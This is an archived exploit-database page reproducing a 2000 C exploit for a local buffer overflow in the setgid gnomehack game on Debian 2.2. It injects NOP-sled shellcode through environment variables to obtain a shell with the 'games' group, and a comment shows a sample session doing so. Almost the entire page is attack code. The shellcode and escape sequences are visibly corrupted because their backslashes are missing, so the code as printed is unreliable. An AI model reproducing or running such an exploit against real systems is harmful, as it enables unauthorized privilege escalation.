[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : GnomeHack Local Buffer Overflow Exploit (gid=games)
# Published : 2000-12-04
# Author : Cody Tubbs
# Previous Title : expect (/usr/bin/expect) buffer overflow
# Next Title : gnome_segv local buffer overflow 


/*
 * (gnomehack) local buffer overflow. (gid=games(60))
 *
 * Author: Cody Tubbs (loophole of hhp).
 * www.hhp-programming.net / pigspigs@yahoo.com
 * 12/17/2000
 *
 * Tested on Debian 2.2, kernel 2.2.17 - x86.
 * sgid "games"(60) by default.
 *
 * bash-2.03$ id
 * uid=1000(loophole) gid=501(noc)
 * bash-2.03$ ./h 0 0
 * Ret-addr 0x7fffe81c, offset: 0, allign: 0.
 * Can't resolve host name "????????????????"!
 * sh-2.03$ id
 * uid=1000(loophole) gid=501(noc) egid=60(games)
 * sh-2.03$
 */

#include <stdio.h>

#define OFFSET 0
#define ALLIGN 0
#define NOP    0x90
#define DBUF   256 //120(RET*30)+((RET))+132(RET*33)
#define GID    60

static char shellcode[]=
  "x31xdbx31xc9xbbxffxffxffxffxb1x00x31xc0"
  "xb0x47xcdx80x31xdbx31xc9xb3x00xb1x00x31"
  "xc0xb0x47xcdx80xebx1fx5ex89x76x08x31xc0"
  "x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08"
  "x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8"
  "xdcxffxffxffx2fx62x69x6ex2fx73x68x69";

long get_sp(void){
  __asm__("movl %esp,%eax");
}

void workit(char *heh){
  fprintf(stderr, "ngnomehack local exploit for Debian 2.2 - x86n");
  fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)nn");
  fprintf(stderr, "Usage: %s <offset> [allign(0..3)]n", heh);
  fprintf(stderr, "Examp: %s 0n", heh);
  fprintf(stderr, "Examp: %s 0 1n", heh);
  exit(1);
}

main(int argc, char **argv){
  char eipeip[DBUF], buffer[4096], heh[DBUF+1];
  int i, offset, gid, allign;
  long address;

  if(argc < 2){
    workit(argv[0]);
  }
 
  if(argc > 1){
    offset = atoi(argv[1]);
  }else{
    offset = OFFSET;
  }

  if(argc > 2){
    allign = atoi(argv[2]);
  }else{
    allign = ALLIGN;
  }

  address = get_sp() - offset;

  if(allign > 0){
    for(i=0;i<allign;i++){
      eipeip[i] = 0x69; //0x69.DOOT:D
    }
  }

  for(i=allign;i<DBUF;i+=4){
    *(long *)&eipeip[i] = address;
  }

  gid = GID;
  shellcode[10] = gid;
  shellcode[22] = gid;
  shellcode[24] = gid;
 
  for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
    buffer[i] = NOP;
  }
 
  memcpy(heh, eipeip, strlen(eipeip));
  memcpy(heh, "DISPLAY=", 8);//HOME||DISPLAY
  putenv(heh);

  memcpy(buffer+i, shellcode, strlen(shellcode));
  memcpy(buffer, "HACKEX=", 7);
  putenv(buffer);
 
  fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.n",address, offset, allign);
  execlp("/usr/lib/games/gnomehack/gnomehack", "gnomehack", 0); //Mod path if needed.
}


// www.Syue.com [2000-12-04]